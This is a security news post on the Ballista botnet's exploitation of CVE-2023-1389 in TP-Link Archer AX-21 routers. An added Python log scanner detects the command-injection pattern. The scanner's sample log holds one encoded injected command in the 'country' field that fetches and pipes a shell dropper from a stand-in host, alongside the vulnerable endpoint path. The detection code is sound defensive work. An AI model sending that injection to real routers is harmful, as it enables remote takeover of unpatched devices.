New Ballista Botnet spreads using TP-Link flaw. Is it an Italian job?
Cato CTRL researchers have discovered the Ballista botnet exploiting CVE-2023-1389, an unauthenticated command injection vulnerability in TP-Link Archer AX-21 routers that yields remote code execution as root. The botnet was first observed in January 2025 and is still active. The exploit delivers a payload that fetches a shell dropper from an attacker-controlled server; the dropper then establishes an encrypted C2 channel through which the operators execute commands and launch further attacks. Over 6,500 devices have been infected, primarily in the manufacturing, healthcare, services, and technology sectors across multiple countries. Researchers attribute Ballista to an Italian threat actor based on Italian-language strings in the malware and the IP addresses used by the operators. The vulnerability was originally reported during Pwn2Own Toronto 2022, and TP-Link published fixed firmware for the affected model in 2023, so the compromised routers are ones that were never updated.
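Defenders who log traffic to their routers can spot exploitation attempts before a dropper lands. The following is an added example written for this page, not code from Cato CTRL or from the article: it scans constructed HTTP access-log lines for the CVE-2023-1389 injection pattern. The endpoint path and the `country` parameter are taken from public advisories for the CVE rather than from the article above, and the sample lines (including the 203.0.113.5 documentation address and `dropper.sh` filename) are constructed for the example.

```python
"""Flag HTTP requests that look like CVE-2023-1389 exploitation attempts.

Public advisories for CVE-2023-1389 place the injection point in the
`country` parameter of the router's locale endpoint
(/cgi-bin/luci/;stok=/locale?form=country). Those details are an
assumption of this example, not something stated in the article.
"""
import re
from urllib.parse import parse_qs, unquote

# Assumed from public CVE write-ups, not from the article.
LOCALE_PATH = "/cgi-bin/luci/;stok=/locale"

# Shell metacharacters that have no business in a two-letter country code.
SHELL_META = re.compile(r"[;|&`]|\$\(|\$\{")

# Constructed sample log lines: "<method> <path?query> <urlencoded body or ->".
# The second line carries an injected download-and-run command; the others
# are benign traffic to the same or unrelated endpoints.
SAMPLE_LOG = [
    "POST /cgi-bin/luci/;stok=/locale?form=country operation=write&country=US",
    "POST /cgi-bin/luci/;stok=/locale?form=country "
    "operation=write&country=%24%28wget+http%3A%2F%2F203.0.113.5%2Fdropper.sh"
    "+-O-+%7C+sh%29",
    "GET /cgi-bin/luci/;stok=/locale?form=country -",
    "POST /login?form=login operation=login&username=admin",
]


def parse_line(line):
    """Split one log line into method, path, query dict and body dict."""
    method, target, body = line.split(" ", 2)
    path, _, query = target.partition("?")
    body_params = parse_qs(body) if body != "-" else {}
    return method, path, parse_qs(query), body_params


def injected_command(line):
    """Return the decoded `country` value if it carries shell syntax, else None.

    parse_qs already percent-decodes once; the extra unquote() catches a
    double-encoded payload, which is a common evasion for naive filters.
    """
    _method, path, query, body = parse_line(line)
    if not path.startswith(LOCALE_PATH):
        return None
    if query.get("form", [""])[0] != "country":
        return None
    for value in body.get("country", []):
        decoded = unquote(value)
        if SHELL_META.search(decoded):
            return decoded
    return None


def is_exploit_attempt(line):
    """True when the line matches the CVE-2023-1389 injection pattern."""
    return injected_command(line) is not None


def scan(lines):
    """Return the subset of log lines that look like exploitation attempts."""
    return [line for line in lines if is_exploit_attempt(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("suspicious:", injected_command(hit))
```

The check keys on the combination of endpoint, parameter and shell syntax rather than on a specific payload, so it also flags variants that fetch the dropper with curl or a different host. A legitimate locale write only ever carries a short country code, which is why any metacharacter in that field is treated as a hit.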